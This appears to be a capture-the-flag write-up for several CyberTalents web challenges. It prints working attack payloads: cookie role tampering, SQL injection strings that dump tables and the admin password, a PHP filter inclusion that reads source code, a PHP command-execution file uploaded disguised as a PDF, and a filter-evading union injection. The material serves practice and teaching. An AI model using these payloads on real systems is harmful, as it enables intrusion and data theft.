{%hackmd Y7Gu-IQIQUWGHO_MeieqvQ %} # CYBERTALENTS WEB CHALLENGES WRITEUPS ## ADMIN HAS THE POWER So when we open the link we are taken to a login page . I tried *admin* aas username and *admin* as password but it didn't go through. So i decided to take a look at the source code. ``` ┌──(c0d3x㉿pawn)-[~] └─$ curl http://wcamxwl32pue3e6m5p6v4ehxzg1rm2360kxlcg30-web.cybertalentslabs.com <!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <!-- The above 3 meta tags *must* come first in the head; any other head content must come *after* these tags --> <title>Admin Panel</title> <!-- Bootstrap --> <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous"> <!-- HTML5 shim and Respond.js for IE8 support of HTML5 elements and media queries --> <!--[if lt IE 9]> <script src="https://oss.maxcdn.com/html5shiv/3.7.3/html5shiv.min.js"></script> <script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script> <![endif]--> <!-- TODO: remove this line , for maintenance purpose use this info (user:support password:x34245323)--> </head> <body> <div class="container" style="padding-top :150px;"> <div class="row"> <div class="col-sm-6 col-sm-offset-3"> <form class="form-horizontal" method="post" action=""> <div class="form-group"> <label for="username" class="col-sm-2 control-label">Username</label> <div class="col-sm-10"> <input name="username" type="text" class="form-control" id="username" placeholder="Username"> </div> </div> <div class="form-group"> <label for="password" class="col-sm-2 control-label">Password</label> <div class="col-sm-10"> <input name="password" type="password" class="form-control" id="password" placeholder="Password"> </div> </div> <div class="form-group"> <div class="col-sm-offset-2 col-sm-10"> <button type="submit" class="btn btn-default">Sign in</button> </div> </div> </form> </div> </div> </div> <!-- jQuery (necessary for Bootstrap's JavaScript plugins) --> <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.4/jquery.min.js"></script> <!-- Include all compiled plugins (below), or include individual files as needed --> <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script> <script> </script> </body> </html> ``` We see a user name and password *(user:support password:x34245323)* so I gave it a shot. So after doing soo I logged in but didn't find any flag but we were left a clue. ![](https://i.imgur.com/aJoZBrc.png) Here we see a clue that you need better privilages which means admin soo i took a look at the cookies using the cookie editor extension and i saw a category called role and changed the role to admin. ![](https://i.imgur.com/uWE8AWe.png) Baaang!! You get the flag. ## THIS IS SPARTA In this challenge were are find ourself in a login page and now i try the common usernames and passwords but none of them seem to work. So i decided to look at the source code and there it was, a javscript obfuscated code , so i decide to decode it using [lelinhtinh.github.io/de4js/](https://) and I got the following; ![](https://i.imgur.com/uDQpVq8.png) so we see an array of words. ``` var _0xae5b = ["value", "user", "getElementById", "pass", "Cyber-Talent", " Congratz \x0A\x0A", "wrong Password"]; function check() { var _0xeb80x2 = document[_0xae5b[2]](_0xae5b[1])[_0xae5b[0]]; var _0xeb80x3 = document[_0xae5b[2]](_0xae5b[3])[_0xae5b[0]]; if (_0xeb80x2 == _0xae5b[4] && _0xeb80x3 == _0xae5b[4]) { alert(_0xae5b[5]); } else { alert(_0xae5b[6]); } } ``` From this code we can say the following; ``` var _0xeb80x2 = document[getElementById] [user] [value]; var _0xeb80x3 = document[getElementById] [pass] [value]; if (_0xeb80x2 == [pass] && _0xeb80x3 == Cyber-Talent){ alert(Congratz \x0A\x0A") }else { alert(wrong Password") } ``` So from here we see that the username and password should be *Cyber-Talent*. When we login in with this credentials we see a pop up containing the flag. ![](https://i.imgur.com/RV6mw5K.gif) ## SHARE THE IDEAS When we click are take to a page where we have to login so that we can be able to comment. I created an account and logged in. I typed *a* and it was added to the comments. I added an *'* and i got an error and noticed the site vulnerable to sql injection. From the error given i noticed it used sqlite So to get the version of sqlite being used the following payload worked; ``` a' || (select sqlite_version()));-- ``` After that I wanted to know what tables are in the db, so I ran the following; ``` a' || (select sql from sqlite_master));-- ``` The above showed the following results; ![](https://i.imgur.com/ziCQfbZ.png) After seeing this, coming up with the final command to give the password was easy; ``` a' || (select password from xde43_users where role="admin"));-- ``` ![](https://i.imgur.com/oO09RvW.jpg) ## DARK PROJECT On clicking the link we go to a website that at first looks soo normal until you start click the contact, about and project and notice that nothing is changing. So I decided to look at the link and noticed somthing very fishy; ``` http://wcamxwl32pue3e6m14nzyr6cn3kmm2360kxlcg30-web.cybertalentslabs.com/index.php?home=about ``` So the payload that work is the php encode to base64 and it worked like magic. ``` http://wcamxwl32pue3e6m14nzyr6cn3kmm2360kxlcg30-web.cybertalentslabs.com/index.php?home=php://filter/convert.base64-encode/resource=index ``` ![](https://i.imgur.com/tYHCCSS.png) Since it in base64 string, I copied the base64 encoded text and went to [https://gchq.github.io/CyberChef/#input=](https://) and decode it. ![](https://i.imgur.com/TfLexPp.png) ## JOIN TEAM This challenge was a bit tricky but after doing some research I was able to come up with the solution. We can see that there is a place to upload files but only .pdf files are allowed ![](https://i.imgur.com/JeSKYY4.png) So I did the following; ``` ──(c0d3x㉿pawn)-[~] └─$ echo "<?php system('ls'); ?>" >test.txt ┌──(c0d3x㉿pawn)-[~] └─$ mv test.txt test.pdf ``` I uploaded the test.pdf and magic!! It was successfully uploaded. ![](https://i.imgur.com/kQSu9VS.png) ![](https://i.imgur.com/2VxGqBv.png) So I clicked on the test.pdf and i noticed something at the url... ![](https://i.imgur.com/w5eaRWi.png) I saw the */data/test.pdf* so I copied as follows; ``` data/test.pdf http://wcamxwl32pue3e6m86dv92kb4zlgm2360kxlcg30-web.cybertalentslabs.com/index.php?jobs and added data/test.pdf and the ls command was executed. ``` ![](https://i.imgur.com/MBKASUU.png) I edited the php code as follows; ``` <? php system('cat index.php'); ?> ``` After that we get the flag. ## I AM A LEGEND In this challenge we are given a login page. I tried the default credentials but couldn't login. I took a look at the source code and i saw an obfuscated jsfuck code. ![](https://i.imgur.com/PeSil5b.png) Look the link below and it'll share some light on how to decode the jsfuck ;). [https://medium.com/@vladtoie/cybertalents-iam-legend-web-challenge-writeup-cca64d3c09f](https://) ## WEIRD BLOQ So this was some weird bloq as stated. I went to the search bar and tried searching for a raandom word but it didn't show any results. I thought for a while and decide to put search for the following; ``` a || b ``` After seaching for it, the following was displayed. ![](https://i.imgur.com/t8Xgi4H.png) I fuzzed the url and I got a robots.txt file. I opened the robots.txt file and got a *git.phps* which was downloadable file which contained the source code; ![](https://i.imgur.com/Jwdm2LR.png) After minutes of research the i finally found the payload that could get the flag ``` h%a' uNion(sElect(t.cOlumn_name)from(sElect(cOlumn_name),(table_namE)from(infOrmation_schema.COLUMNS)having(table_namE)=('FL@g'))t)# ```